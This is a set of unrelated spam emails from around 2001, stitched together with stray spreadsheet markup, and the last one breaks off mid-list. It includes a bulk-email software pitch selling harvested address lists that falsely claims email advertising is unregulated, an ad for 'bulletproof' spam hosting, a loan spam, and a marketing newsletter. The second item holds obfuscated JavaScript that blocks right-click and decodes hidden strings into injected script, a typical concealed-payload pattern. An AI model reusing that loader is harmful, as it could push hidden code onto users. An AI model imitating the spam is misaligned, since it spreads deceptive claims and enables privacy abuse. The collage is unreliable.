3) Let's say you... Receive JUST 1 ORDER for EVERY 2,500 EMAILS.CALCULATION OF YOUR EARNINGS BASED ON THE ABOVE STATISTICS:
[Day 1]: $3,990  [Week 1]: $27,930  [Month 1]: $111,720----- ---- --- -- -  -
You now know why you receive so many email advertisements...
===&gt; BROADCAST EMAIL ADVERTISING IS EXTREMELY PROFITABLE!1) What if you... Sell a $99.95 PRODUCT or SERVICE?
2) What if you... Broadcast Email to 30,000,000+ PEOPLE MONTHLY?
3) What if you... Receive 1 ORDER for EVERY 250 EMAILS?Just IMAGINE =&gt; DAY 30! ==&gt; WEEK 30!! ===&gt; MONTH 30!!!==&gt; The PROFITS that Broadcast Email CAN GENERATE are AMAZING!** According to Forrester Research, a Broadcast Email Ad is up to
** 15 TIMES MORE Likely to Result in a Sale than a Banner Ad!----- ---- --- -- -  -
[COMPARISON OF INTERNET ADVERTISING METHODS]:
==================================================================
=&gt; A 1/20 Page Targeted Web Site Banner Ad to 5 Million People
   on the Internet can cost you about $100,000.=&gt; A 5 Page Targeted Direct Mail Advertisement to 1 Million People
   through the Postal Service can cost you about $500,000.=&gt; A 50 Page Targeted HTML Broadcast Email Advertisement with
   Pictures to 50,000,000 People through the Internet is Free...Which advertising method sounds most appealing to you?=================================================================="Targeted direct email advertising is the wave of the future.
 By no other means can you effectively reach your market so
 quickly and inexpensively." - ONLINE PROFITS NEWSLETTER"Many business people are finding out that they can now advertise
 in ways that they never could have afforded in the past.  The
 cost of sending mass e-mail is extremely low, and the response
 rate is high and quick." - USA TODAY---- --- -- -  -
[EXAMPLE OF A PERSONALIZED/TARGETED BROADCAST EMAIL]:
-------- ------- ------ ----- ---- --- -- -  -
From: kate@cattiesinc.com
To: mary@commtomm.com
Subject: Cat Information!Hi Mary,Are you interested in receiving up to 80% SAVINGS on CAT SUPPLIES?
If so, come visit our web site at: http://www.cattiesinc.com==================================================================
=&gt; With Broadcast Email Software, a Broadcast Email Advertisement
=&gt; like this one can be AUTOMATICALLY sent to up to 1,000,000 
=&gt; PEOPLE on a DAILY BASIS with LESS than 2 MINUTES of YOUR TIME!"IMT Strategies Reports an Average of a 16.4% CLICK THROUGH RATE
 from users that have received a Broadcast Email Advertisement!"----- ---- --- -- -  -
Our Broadcast Email Software with DNS Technology Automatically
Creates 10 SUPER-FAST MAIL SERVERS on Your COMPUTER used to Send
out Your Broadcast Emails Directly to the Recipients!==&gt; With this NEW EMAIL SENDING TECHNOLOGY... 
==&gt; Your Internet Provider's Mail Servers are NOT USED!There are NO Federal Regulations or Laws on Email Advertising &amp;
Now with our Software, You Can Avoid Internet Provider Concerns!---- --- -- -  -
BE PREPARED!  You may receive A HUGE AMOUNT of orders within
minutes of sending out your first Broadcast Email Advertisement!* According to Digital Impact, 85% of Broadcast Email Offers are
  responded to within the FIRST 48 HOURS!  (IMMEDIATE ORDERS!)"When you reach people with e-mail, they're in a work mode, even
 if they're not at work.  They're sitting up, they're alert.  You
 catch them at a good moment, and if you do it right, you have a
 really good shot of having them respond."
 - WILLIAM THAMES [Revnet Direct Marketing VP]* An Arthur Anderson Online Panel Reveals that 85% of Online Users
  say that Broadcast Email Advertisements have led to a purchase!"==================================================================
=&gt; If you send a Broadcast Email Advertisement to 50,000,000
=&gt; People and Just 1 of 5,000 People Respond, You Can Generate
=&gt; 10,000 EXTRA ORDERS!  How Much EXTRA PROFIT is this for You?
=================================================================="According to FloNetwork, US Consumers DISCOVER New Products and
 Services 7+ TIMES MORE LIKELY through an Email Advertisement,
 than through Search Engines, Magazines and Television COMBINED!"Only a HANDFUL of Companies on the Internet have Discovered
Broadcast Email Advertising... =&gt; NOW YOU CAN BE ONE OF THEM!!** United Messaging says there are 890+ MILLION EMAIL ADDRESSES!
** GET READY!  Now with Broadcast Email, You Can Reach them ALL!------ ----- ---- --- -- -  -
As Featured in: "The Boston Globe" (05/29/98),
"The Press Democrat" (01/08/99), "Anvil Media" (01/29/98):
==================================================================
[NIM Corporation Presents]: THE BROADCAST EMAIL PACKAGE
==================================================================
REQUIREMENTS: WIN 95/98/2000/ME/NT or MAC SoftWindows/VirtualPC=&gt; [BROADCAST EMAIL SENDER SOFTWARE] ($479.00 Retail):
    Our Broadcast Email Sender Software gives you the ability to
    send out Unlimited, Personalized and Targeted Broadcast Email 
    Advertisements to OVER 500,000,000 People on the Internet at
    the rate of up to 1,000,000 DAILY, AUTOMATICALLY and for FREE!
    Have a List of Your Customer Email Addresses?  Now you can
    Broadcast Email Advertise to them with our software!=&gt; [TARGETED EMAIL EXTRACTOR SOFTWARE] ($299.00 Retail):
    Our Targeted Email Extractor Software will Automatically
    Navigate through the TOP 8 Search Engines, 50,000+ Newsgroups,
    Millions of Web Sites, Deja News, Etc.. and Collect MILLIONS
    of Targeted Email Addresses by using the keywords of your
    choice!  This is the ULTIMATE EXTRACTOR TOOL!=&gt; [28,000,000+ EMAIL ADDRESSES] ($495.00 Retail):
    MILLIONS of the NEWEST &amp; FRESHEST General Interest and
    Regionally Targeted Email Addresses Separated by Area Code,
    State, Province, and Country!  From Alabama to Wyoming,
    Argentina to Zimbabwe!  28,000,000+ FRESH EMAILS are ALL YOURS!=&gt; [STEP BY STEP BROADCAST EMAIL PACKAGE INSTRUCTIONS]:
    You will be Guided through the Entire Process of Installing
    and Using our Broadcast Email Software to Send out Broadcast
    Email Advertisements, like this one, to MILLIONS of PEOPLE for
    FREE!  Even if you have NEVER used a computer before, these
    instructions make sending Broadcast Email as EASY AS 1-2-3!=&gt; [THE BROADCAST EMAIL HANDBOOK]:
    The Broadcast Email Handbook will describe to you in detail,
    everything you ever wanted to know about Broadcast Email!
    Learn how to write a SUCCESSFUL Advertisement, how to manage
    the HUNDREDS of NEW ORDERS you could start receiving, what
    sells BEST via Broadcast Email, etc...  This Handbook is a
    NECESSITY for ANYONE involved in Broadcast Email!=&gt; [UNLIMITED CUSTOMER &amp; TECHNICAL SUPPORT]:
    If you ever have ANY questions, problems or concerns with
    ANYTHING related to Broadcast Email, we include UNLIMITED
    Customer &amp; Technical Support to assist you!  Our #1 GOAL is
    CUSTOMER SATISFACTION!=&gt; [ADDITIONAL INFORMATION]:
    Our Broadcast Email Software Package contains so many
    features, that it would take five additional pages just to
    list them all!  Duplicate Removing, Automatic Personalization,
    and Free Upgrades are just a few of the additional bonuses
    included with our Broadcast Email Software Package!=&gt; ALL TOGETHER our Broadcast Email Package contains EVERYTHING
   YOU WILL EVER NEED for your entire Broadcast Email Campaign!** You Will Receive the ENTIRE Broadcast Email Package with
   EVERYTHING Listed Above ($1,250.00+ RETAIL) for ONLY $499.00!
==================================================================
=&gt; BUT WAIT!!!  If You Order by Friday, June 29th, You Will
   Receive the ENTIRE Broadcast Email Package for ONLY $295.00!!
==================================================================Regardless, if you send to 1,000 or 100,000,000 PEOPLE...You will NEVER encounter any additional charges ever again!
Our Broadcast Email Software sends Email for a LIFETIME for FREE!----- ---- --- -- -  -
Since 1997, we have been the Broadcast Email Marketing Authority.
Our #1 GOAL is to see YOU SUCCEED with Broadcast Email Advertising.We are so confident about our Broadcast Email Package, that we are
giving you 90 DAYS to USE OUR ENTIRE PACKAGE FOR FREE!==&gt; You can SEND Unlimited Broadcast Email Advertisements!
==&gt; You can EXTRACT Unlimited Targeted Email Addresses!
==&gt; You can RECEIVE Unlimited Orders!If you do not receive at least a 300% INCREASE in SALES or are not
100% COMPLETELY SATISFIED with each and every single aspect of our
Broadcast Email Package, simply return it to us within 90 DAYS for
a 100% FULL REFUND, NO QUESTIONS ASKED!!Best of ALL, if you decide to keep our Broadcast Email Package, it
can be used as a 100% TAX WRITE OFF for your Business!---- --- -- - -
See what users of our Broadcast Email Package have to say...
=================================================================="Since using your program, I have made as much in two days as I
 had in the previous two weeks!!!!!  I have to say thank you for
 this program - you have turned a hobby into a serious money
 making concern."
 = W. ROGERS - Chicago, IL"We have used the software to send to all our members plus about
 100,000 off the disk you sent with the software and the response
 we have had is just FANTASTIC!!  Our visits and sales are nearly
 at an all time high!"
 = A. FREEMAN - England, UK"I have received over 1200 visitors today and that was only
 sending out to 10,000 email addresses!"
 = K. SWIFT - Gunnison, CO"I'm a happy customer of a few years now.  Thanks a lot....I love
 this program.."
 = S. GALLAGHER - Melville, NY"Thanks for your prompt filing of my order for your broadcast email
 software -- it took only about a day.  This is faster than ANYBODY
 I have ever ordered something from!  Thanks again!"
 = W. INGERSOLL - Scottsdale, AZ"I feel very good about referring the folks I have sent to you
 thus far and will continue to do so.  It is rare to find a company
 that does business this way anymore...it is greatly appreciated."
 = T. BLAKE - Phoenix, AZ"Your software is a wonderful tool! A++++"
 = S. NOVA - Los Angeles, CA"Thank you for providing such a fantastic product."
 = M. LOPEZ - Tucson, AZ"Your tech support is the best I have ever seen!"
 = G. GONZALEZ - Malibu, CA"I am truly impressed with the level of service.  I must admit I
 was a bit skeptical when reading your ad but you certainly deliver!"
 = I. BEAUDOIN - Toronto, ON"My first go round gave me $3000 to $4000 in business in less than
 one week so I must thank your company for getting me started."
 = A. ROBERTS - San Francisco, CA"We are really happy with your Email program.  It has increased
 our business by about 500%."
 = M. JONES - Vancouver, BC"IT REALLY WORKS!!!!!  Thank you thank you, thank you."
 = J. BECKLEY - Cupertino, CA----- ---- --- -- -  -
[SOUND TOO GOOD TO BE TRUE?]** If you Broadcast Email to 500,000 Internet Users Daily...
** Do you think that maybe 1 of 5,000 may order?=&gt; If so... That is 100 EXTRA (COST-FREE) ORDERS EVERY DAY!!Remember.. You have 90 DAYS to use our Broadcast Email Package
for FREE and SEE IF IT WORKS FOR YOU!If YOU are not 100% COMPLETELY SATISFIED, SIMPLY RETURN the
Broadcast Email Package to us within 90 DAYS for a FULL REFUND!--- -- -  -
[BROADCAST EMAIL SOFTWARE PACKAGE]: Easy Ordering Instructions
==================================================================
=&gt; Once your order is received we will IMMEDIATELY RUSH out the
=&gt; Broadcast Email Package on CD-ROM to you via FEDEX PRIORITY
=&gt; OVERNIGHT or PRIORITY INTERNATIONAL the SAME DAY =&gt; FREE!!------- ------ ----- ---- --- -- -  -
[TO ORDER BY PHONE]:
To order our Broadcast Email Software Package by phone with
a Credit Card or if you have any additional questions, please 
call our Sales Department M-F from 8am to 5pm PST in the USA at:=&gt; (888)6-NEUPORT / (888)663-8767 or NON-USA at: (541)482-1285** ALL Major Credit Cards are Accepted!To Be REMOVED From Our Email List in the USA Call: (888)352-5443
NON-USA Residents or to FAX Your Remove Request Call: (240)526-6546
------- ------ ----- ---- --- -- -  -
[TO ORDER BY FAX]:
To order our Broadcast Email Software Package by fax with a Credit
Card, please print out the order form at the bottom of this email
and complete all necessary blanks.  Then, fax the completed order
form to:=&gt; (541)482-1315------- ------ ----- ---- --- -- -  -
[TO ORDER BY POSTAL MAIL]:
To order our Broadcast Email Software Package with a Cashiers
Check, Credit Card, US Money Order, US Personal Check, or US Bank
Draft by postal mail, please print out the order form at the
bottom of this email and complete all necessary blanks.Then, send it along with payment of U.S. $295.00 postmarked by
Friday, June 29th, or $499.00 after Friday, June 29th to:NIM Corporation
1314-B Center Drive #514
Medford, OR 97501
United States of America----- ---- --- -- -  -
"OVER 20,000 BUSINESSES come on the Internet EVERY single day...
If you don't send out Broadcast Email... YOUR COMPETITION WILL!"------- ------ ----- ---- --- -- -  -
[Broadcast Email Software Package]: ORDER FORM
(c)1997-2001 NIM Corporation.  All Rights Reserved
==================================================================Company Name: ____________________________________________________Your Name: _______________________________________________________BILLING ADDRESS: _________________________________________________City: ________________________ State/Province: ___________________Zip/Postal Code: _______________ Country: ________________________NON POBOX SHIPPING ADDRESS: ______________________________________City: ________________________ State/Province: ___________________Zip/Postal Code: _______________ Country: ________________________Phone Number: ___________________ Fax Number: ____________________Email Address: ___________________________________________________** To Purchase by Credit Card, Please Complete the Following:Visa [ ]  Mastercard [ ]  AmEx [ ]  Discover [ ]  Diners Club [ ]Name on Credit Card: _____________________________________________CC Number: _________________________________ Exp. Date: __________Amount to Charge Credit Card ($295.00 or $499.00):  ______________Signature: _______________________________________________________==================================================================</t>
  </si>
  <si>
    <t>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}document.oncontextmenu = nocontextmenu;		// for IE5+
document.onmousedown = norightclick;		// for all others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);function bound( min_val, value, max_val )
{    if( value &lt; min_val ) {       value = min_val;   }
   if( value &gt; max_val ) {       value = max_val;    }
   return value;
}function aton( string, index )
{  
   index = bound( 0, index, string.length-1 );
   return char_all.indexOf( string.charAt( index ), 0 );
}function ntoa( index )
{  // Convert a number to a character.  The range is 0x00 to 0xFF inclusive.
   // Revision 1.00, becd.
   index = bound( 0, index, 0xFF );
   return char_all.charAt( index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--&gt;function go()
{
var tt="";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3%F3%A3%A1%E1%AF%A2%B7%BF%A6%A4%BD%B9%A3%BF%BE%FB%A0%A2%E2%AB%B9%A1%AB%B5%AD%BF%AB%A8%A2%EA%EE%FD%B3','32891212');document.write("&lt;script&gt;");
document.write(tt);
document.write('&lt;');
document.write('\u002F');
document.write('script');
document.write('&gt;');tt=dede('%F0%9F%89%8E%84%8F%EC%BC%A1%A8%BC%A2%F1%FC%FD%E9%E8%AB%A0%A2%AF%A2%F5%A9%A9%A5%BC%A9%BA%EA%AE%A4%BA%A8%AD%B8%F1%FB%F6%F0%9C%88%83%8F%91%F2%F4%9E%9E%F5%F4%98%8C%F4%F0%8F%81%9A%E8%AB%A0%A2%AF%A2%F5%A9%A9%A5%BC%A9%BA%F4%F0%89%F6%F0%8E%85%82%9F%E8%AA%A9%A9%A9%F6%89%BE%A1%AB%A0%EB%AB%A3%A4%A5%BE%F6%EB%F4%F8%FA%FC%F3%F8%EC%BB%A3%B6%AE%F5%F9%F6%82%8D%99%8C%8F%87%98%89%EB%9B%89%90%EA%9B%8E%8D%87%84%B3%F0%E4%8E%83%86%9E%F2%F7%E7%8E%F6%EA%F0%E4%8C%85%9E%F4%F0%E4%9C%88%F6%F6%E3%9F%9A%F2%F4%E5%98%89%87%88%91%F4%F0%E4%9C%8D%8A%86%89%F5','347375');
document.write(tt);
tt=dede('%F0%9F%89%8E%84%8F%EC%A8%AD%A0%A4%99%BC%AA%AB%A5%A6%AD%F1%FB%E8%AF%AD%A6%A0%9B%A9%A8%AC%A3%A2%AC%F5%FD%E8%BD%A5%AF%BC%A4%F5%F9%FB%FB%E8%AD%A4%A3%AB%A5%F5%AF%AD%A4%B8%AE%BA%EC%AA%A5%BE%AF%AD%BE%F5%FA%F2%F7%9C%8E%87%8E%95%F5%F4%98%9A%F4%F0%9F%8C%EC%BF%A3%A8%BF%A0%F1%F9%FA%FC%EE%E8%AE%AF%89%A3%A7%A7%BE%F5%A8%A0%AA%AB%A7%F6%F6%98%8A%8A%80%8D%EA%AF%AE%A4%A0%9B%BA%AD%A8%A1%A2%AF%F7%FC%EB%AB%A9%A4%A6%9C%AA%AC%A8%A1%A4%AB%F6%FD%EC%BF%A3%A8%BF%A0%F1%EA%FB%FC%FB%ED%EE%E8%A8%A3%B9%AC%A9%BA%F7%FC%F5%F4%98%8A%85%88%92%F6%F0%9C%98%F2','347375');
document.write(tt);
tt=dede('%F0%9F%8C%EC%BE%8B%A0%A2%AF%A2%F5%BE%A3%BB%E8%AD%A4%A3%AB%A5%F5%A0%AD%AC%B8%EB%BF%A5%AC%BE%A4%F6%EA%FD%F8%FA%E9%E9%E8%AE%AF%89%A3%A7%A7%BE%F5%E9%AF%A8%AB%AF%AE%AC%F2%F7%98%EC%A9%A6%A5%AC%A6%F1%AB%AF%A2%BF%AD%BE%F6%F6%8F%8E%86%98%8D%98%F2%F7%8E%83%86%9E%EC%AD%A9%AF%AD%F7%AD%B9%A1%AD%A4%EA%BF%A2%B2%A9%F5%F8%F2%F7%8A%F2%A4%A3%BA%AE%E8%AA%AD%AF%A8%B8%E8%AA%BA%A5%A1%EB%BF%A9%AA%A9%AD%A6%BB%EC%A9%BE%EC%A3%A7%A1%AD%F6%E3%89%F6%E2%E8%82%AD%B9%AC%AF%A7%B8%A9%B8%AD%B4%E8%A3%BF%EB%BC%A4%AD%EA%AE%A2%AF%AB%AD%B9%B8%EB%AD%BE%A7%BE%A5%A8%E8%BB%AD%A8%AF%AA%A5%EC%AB%A5%A1%A6%BD%A2%A1%BE%B5%EB%A1%A2%E8%BE%A4%AE%E8%BB%A7%B8%A0%AF%E9','347375');
document.write(tt);
tt=dede('%8F%BE%A5%EC%BB%AF%A9%EB%AF%A5%BA%A6%BF%EB%AE%BE%A7%A7%EC%AA%A4%A0%E8%A5%BA%AE%BA%EC%BC%A2%A9%EB%BF%A3%BA%A6%A8%E5%E8%F0%8A%F4%81%8A%83%89%E8%B3%83%9E%9A%EC%8C%98%89%8A%85%9F%E8%88%89%88%87%81%8D%EA%9E%8E%89%80%81%9E%B5%E5%E6%E2%E6%E4%EC%87%81%9A%8D%EB%F0%E4%8A%F2%E8%AF%BA%AE%BA%B5%E8%AE%AD%B2%E8%BB%AD%EA%A4%AA%BE%A9%E8%A4%A9%BC%E8%BF%AD%A4%A8%AE%BA%BF%E8%A5%A2%A7%A1%A2%AD%EA%E2%E5%E6%AF%BD%A7%EC%A2%A6%B8%A7%EA%B8%A3%AD%EC%BF%A5%BE%A7%AC%EC%A7%AC%EC%F7%8A%F2%84%83%9A%8E%E8%89%9A%85%98%82%8B%ED%E9%EB%ED%F7%8A%9E%F6%F6%E3%89%F6%F0%E7%8C%83%85%9C%F2%F4%E5%8F%8E%86%98%8D%98%F2%F7%98%EC%A9%A6%A5%AC%A6%F1%AB%AF%A2%BF%AD%BE%F6%F6%8E%99%F6','347375');
document.write(tt);
tt=dede('%F0%8D%87%82%9C%EA%AA%AA%AB%A9%F5%E8%9A%AE%BA%A8%A9%A4%AD%E7%E8%8D%BA%A3%AD%A7%E4%EC%80%AF%A0%BD%AD%B8%A1%A9%AD%E7%E8%BF%A9%A4%BF%E6%BB%A9%BA%A3%AA%E9%E8%BF%A1%B0%A9%F6%FC%F2%F4%88%F2%F9%FC%E3%FF%EA%8A%99%8D%89%E8%99%89%93%E8%9F%80%85%9B%EA%F4%E3%8A%F4%F0%E4%8E%83%86%9E%F2%F7%8A%9E%F6%F6%98%8A%8A%80%8D%EA%AF%AE%A4%A0%9B%BA%AD%A8%A1%A2%AF%F7%FC%EB%AB%A9%A4%A6%9C%AA%AC%A8%A1%A4%AB%F6%FD%EC%BF%A3%A8%BF%A0%F1%EA%FB%FC%FB%ED%EE%E8%A8%A3%B9%AC%A9%BA%F7%FC%F5%F4%98%8A%85%88%92%F6%F0%9C%98%F2%F7%9C%88%E8%AB%A0%A2%AF%A2%F5%A7%A5%AF%AC%A0%AD%F4%F0%82%85%8B%E8%A2%A9%A2%AF%A4%BC%F7%F9%FD%E8%AD%A4%BE%F1%E9%EA%EC%BB%B8%AF%F6%EA%A4%BC%BE%BC%F1%E7%E3%BF%BD%BB%E5%A4%A3%A4%A3%B8%AA%A4%E2%AB%A5%A1%E4%A1%A1%A9%AD%A9%B8%E7%AA%BB%A1%FD%FD%E6%A6%B8%AD%EE','347375');
document.write(tt);
tt=dede('%EC%BC%A1%A8%BC%A2%F1%FC%F0%EC%AA%A5%BE%AF%AD%BE%F5%FB%F2%F7%89%EC%A0%B8%A9%AD%F5%EE%A0%BE%B8%BB%F2%E3%E7%BD%BB%BC%E6%BA%A1%B9%A5%BF%E5%B4%E6%A4%A9%BF%E7%EE%F6%F6%ED%E6%E5%F0%AA%B8%F2%F7%AE%A3%A6%BE%EC%AD%A9%AF%AD%F7%AD%B9%A1%AD%A4%EA%BF%A2%B2%A9%F5%E7%FE%F5%9C%A9%AD%A4%BF%F7%E7%AD%F6%E7%E1%F5%F4%E3%89%F4%F0%E4%9C%88%F6%F6%98%8F%E8%AD%A4%A3%AB%A5%F5%A1%A1%AE%A8%A7%AD%F2%F4%83%81%8C%E8%A4%AD%A3%AB%A3%BC%F1%FD%FC%EC%AA%A4%B8%F5%E8%EE%EB%BB%BE%AB%F7%EE%A3%BC%B8%B8%F0%E3%E4%BF%BB%BF%E4%A0%A4%A4%A5%BC%AB%A0%E5%AB%A3%A5%E5%A5%A6%A9%AB%AD%B9%E3%AD%BB%A7%F9%FF%E2%A1%B8%AB%EA%EA%BB%A2%AC%B8%A0%F7%FB%F3%E8%AE%A7%B8%A8%AE%BA%F1%F9%F4%F0%8A%E8%A4%BA%AF%AA%F6%EA%A4%BC%BE%BC%F1%E7%E3%BF%BD%BB%E5%BE%A5%BB%A3%B8%E6%B0%E2%A6%AF%B8%E4%EA%F2%F4%EB%E1%E6%F4%AE%BA%F4','347375');
document.write(tt);
tt=dede('%F0%AD%A7%A2%BC%EA%AA%AA%AB%A9%F5%AB%BE%A2%A9%A0%E8%B9%A5%B1%AD%F1%E5%F8%F2%88%BD%A1%BB%A2%A3%BF%BB%F0%E7%AB%F2%E6%E5%F2%F4%E5%8D%F5%F4%E3%9C%8E%F2%F7%9C%88%E8%AB%A0%A2%AF%A2%F5%A7%A5%AF%AC%A0%AD%F4%F0%82%85%8B%E8%A2%A9%A2%AF%A4%BC%F7%F9%FD%E8%AD%A4%BE%F1%E9%EA%EC%BB%B8%AF%F6%EA%A4%BC%BE%BC%F1%E7%E3%BF%BD%BB%E5%A4%A3%A4%A3%B8%AA%A4%E2%AB%A5%A1%E4%A1%A1%A9%AD%A9%B8%E7%AA%BB%A1%FD%F2%E6%A6%B8%AD%EE%EB%BF%A5%AC%BE%A4%F6%FF%F4%E8%A8%A3%B9%AC%A9%BA%F7%FD%F5%F4%8D%E8%A2%BE%AE%AE%F1%EA%A2%B8%BF%B8%F6%E7%E5%BB%BC%BF%E2%BE%A3%BF%A2%BC%E1%B0%E4%A2%AE%BC%E3%EA%F4%F0%EA%E5%E1%F4%A8%BE%F5%F4%AA%A7%A4%B8%EB%AE%AD%AB%AF%F1%AA%BA%A5%A9%A6%EC%B8%A1%B6%AD%F7%E1%F9%F6%8E%A1%AD%8E%A4%A7%AE%BB%F6%E3%AA%F6%E1%E5%F4%F0%E4%89%F2%F4%E5%98%8F%F6%F0%E7%9E%9E%F5%F4%E3%9C%88%83%8F%91%F2%F4%E5%98%8A%8A%80%8D%F4','347375');
document.write(tt);
tt=dede('%F0%9F%89%8E%84%8F%EC%BC%A1%A8%BC%A2%F1%E9%FF%F9%ED%E8%EC%AA%A4%A5%AF%A4%F1%A8%AD%A2%BC%AF%BE%EB%AA%A3%BA%AE%A9%B9%F5%FC%F6%F6%98%89%87%88%91%F4%F0%9F%9A%F2%F4%9E%88%F5%F4%8A%87%98%81%F5%F4%85%86%9A%99%9F%E8%A3%A6%A9%A0%A2%AB%A7%F5%E8%AB%A4%AF%A3%E0%E3%F7%E9%E8%B8%B1%BA%A9%F6%AA%B9%BC%BE%A3%A5%E8%BA%A9%A6%B9%AE%F5%EE%8B%A6%A5%A8%A3%EC%A0%AF%BE%AE%E8%B8%A7%EA%AD%A8%AB%A9%BB%B9%EC%A4%BD%BE%E8%B9%A5%BF%AD%EE%E8%A4%AD%A6%AD%F1%8A%9F%98%9F%87%82%E8%A5%A2%A7%A1%AF%A3%F7%EE%AC%A7%E4%E1%E8%F2%EB%F4%E3%8E%85%9E%86%F6%F0%E7%9E%88%F5%F4%E3%9C%98%F2%F7%E7%98%8A%85%88%92%F6%F0%E7%9E%8D%89%84%89%F6%F6%88%82%9E%EC%A9%A6%A5%AC%A6%F1%AB%AF%A2%BF%AD%BE%F6%F6%8E%99%F6%F0%E7%8E%85%9D%F6%F0%E7%9E%88%F5%F4%E3%9C%98%F2%F7%E7%98%8A%85%88%92%F6%F0%E7%9E%8D%89%84%89%F6%F6%E3%9F%8C%F2%F4%E5%98%99%F6%F0%E7%9E%8E%84%8C%95%F6%F6%E3%9F%89%8E%84%8F%F2','347375');
document.write(tt);
}
// --&gt;go();</t>
  </si>
  <si>
    <t xml:space="preserve">
E-Marketing Specials:Â Â Bulletproof hosting $200 per month/ no setup fee.Â Bulletproof POP3 Mailboxes. $200 per month $100 set up.Â Daily Relay Service $100 per month.
Hosting and POP3 $350 per month no setup.Â All 3 $400 per month no setup.Â 
Purchase any of the above packages and you receive
free membership to the $99 club.Â 
FOR MORE INFO: Click HEREÂ To Remove Your Address From Our Mailing List: Click HEREÂ Â </t>
  </si>
  <si>
    <t>We are Loan Specialists.....Tap into our huge network of Lenders!For U.S.A. Homeowners OnlyInterest Rates have Dropped....Start Saving Now!We Will Shop The Best Loan For You!Are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of.CLICK HERE FOR ALL DETAILS http://membres.tripod.fr/zapote24/===================================================================
REMOVAL INSTRUCTIONS: You may automatically remove yourself from any future mailings
by clicking here. mailto:geoposti@uole.com?subject=delete-mort</t>
  </si>
  <si>
    <t xml:space="preserve">
---259765881.993893904265.JavaMail.RovAdmin.rovweb002
Content-Type: text/plain; charset=iso-8859-1Your Membership Community &amp; Commentary (June 29, 2001)
It's All About Making MoneyInformation to provide you with the absolute 
best low and no cost ways of providing traffic 
to your site, helping you to capitalize on the power and potential the web brings to every Net-Preneur. 
--- This Issue Contains Sites Who Will Trade Links With You! --- -------------
IN THIS ISSUE
-------------
32 Easy Ways To Breath New Life Into Any Webpage
Member Showcase
Are You Ready For Your 15 Minutes of Fame?
Win A FREE Ad In Community &amp; Commentary||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;
    Today's Special Announcement:
||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;We can help you become an Internet Service provider within 7 days or we will give you $100.00!!
Click Here
We have already signed 300 ISPs on a 4 year contract, 
see if any are in YOUR town at:
Click Here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
32 Easy Ways To Breath New Life Into Any Webpage
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Â Â Â Â Â  It's true.
Ask the CEOs of Yahoo.com and America Online.Â  They'll
tell you it's true.Â  Send an email to Terry Dean or Allen
Says or Jim Daniels and ask them about it.Â  They'll agree
100% that it's true.Â  Don't just take my word for it.
In fact, you can contact any of the 10,000 folks online
selling web marketing resources, and they will all tell you
emphatically, without question, no doubts whatsoever, that
it is absolutely true.
It's true. ANYONE can earn a living online.Â  Really, they
can.Â  But, it takes several very important components to
join the 5% who are successful on the web.
Â Â Â Â  One of those necessities is a website.
Â Â Â Â  Now, your website does one of two things...
Â Â Â Â  ...it either makes the sale, or it doesn't.
For 95% of online businesses, their websites simply do
not produce results.
And there is a very simple reason for poor performance.
Poor sales letters.
Does your website convince people to make a purchase?
If not, here are 32 easy ways to breathe new life into
your sales letter...
1) Write your sales letter with an individual in mind.
Go ahead and pick out someone, a real person to write your
sales letter to.Â  Doesn't matter if it is grandma or your
next door neighbor or your cat.Â  Write your sales letter
just like you are writing it to them personally.Â  Why?
Because when your potential customer reads, it then it will
seem personal, almost like you wrote it with them in mind.
Too often, sales letters are written as if they were going
to be read to an audience rather than one person.Â  Keep your
sales letters personal, because one person at a time is
going to read them.
2) Use an illustration to get your point across.Â  In my
sales letters I have told stories about my car stalling on
the side of the road to illustrate the idea that we must
constantly add the fuel of advertising to keep our
businesses running. I have compared the hype of easily
making millions online to the chances of me riding bareback
across Montana on a grizzly bear.Â  Leads have read of how
getting to the top of an oak tree relates to aggressively
marketing online. People love a good story that pounds home
a solid message.Â  Tell stories that illustrate a point you
are trying to make.Â  Emphasize a benefit by sharing an
account from the "real world."Â  It effectively creates
interest and further establishes the point.
3) Create an interest in the reader from the very first
line.Â  Your first line of the sales letter should
immediately create a desire in the reader to want to know
more.Â  Go back to the beginning of this article.Â  The first
words were, "It's true."Â  I can guarantee you that either
consciously or subconsciously you thought "What's true?"
Immediately, your mind wanted to know what I was talking
about.Â  Before you even knew it you were right here, 8
paragraphs into this article.Â  Carefully craft your first
line.Â  If you can immediately get them wanting to know more,
you've got a winner.
4) Use bullets. People spend a lot of time reading bulleted
lists. In fact, they often reread them over and over. Use
bulleted lists to stress the benefits of your product or
service, to spell out exactly what is included in your offer.
Use an extra space in between each bullet to really highlight
each line and create a sense of more length to the list.
5) Launch into a bullet list immediately.Â  Shortly after
your opening line, immediately give the reader a bullet
list of benefits to absorb.Â  Hit them with your best shot.
Pull out the big guns and stress "just a few of" the most
important things the reader will discover.Â  By offering a
killer list early in your sales letter, you will automatically
create a desire in the reader to continue through your ad
copy.Â  After all, if they are already interested after the
first list of benefits, they will certainly be open to
finding out even more reasons why your product or service
will aid them.
6) Just let it all flow out.Â  Write down everything that
enters your mind as you are writing your sales letter. You
can edit it later.Â  If you just sit and start writing
everything you know about your product or service and how it
will benefit your customer, you will be amazed at how much
information floods your mind.Â  Write it ALL down.Â  Then read
through it - you'll be able to add a lot more detail to
many of the points.Â  Edit it after you have exhausted all
of your ideas.
7) Make your sales letter personal.Â  Make sure that the
words "you" and "your" are at least 4:1 over "I" and "my."
Your ad copy must be written about YOUR CUSTOMER not
yourself.Â  I'm not sure how the old advertising adage goes,
but it's something like this, "I don't care a thing about
your lawn mower, I just care about my lawn."Â  Leads aren't
interested in you or your products, they are interested in
themselves and their wants and needs.Â  When you are finished
with your sales letter and have uploaded it to a test
webpage, run a check at http://www.keywordcount.com and see
what the ratio between "you" and "your" versus references to
"I," "me," "my," etc.Â  It's a free service.Â  Make sure it's
at least 4:1 in favor of the customer.
8) Write like you speak.Â  Forget all of those rules that
your grammar teacher taught you.Â  Write your sales letters
in everyday language, just like you would talk in person.
Don't be afraid to begin sentences with "And" or "Because."
Don't worry about ending a sentence with a preposition.
Write like you speak. Your sales letter isn't the great
American novel, so don't write it like you are Ernest
Hemingway.
9) Use short paragraphs consisting of 2-4 sentences each.
Long copy works... but long paragraphs do not.Â  Use short
paragraphs that lead into the next paragraph. Don't be
afraid to use short sentences.Â  Like this one.
Or this.
See what I mean?Â  Shorter paragraphs keep the interest of
the reader. Longer paragraphs cause eye strain and often
force the reader to get distracted.
10)Â  Stress the benefits, not the features.Â  Again,
readers want the burning question answered, "What's in it
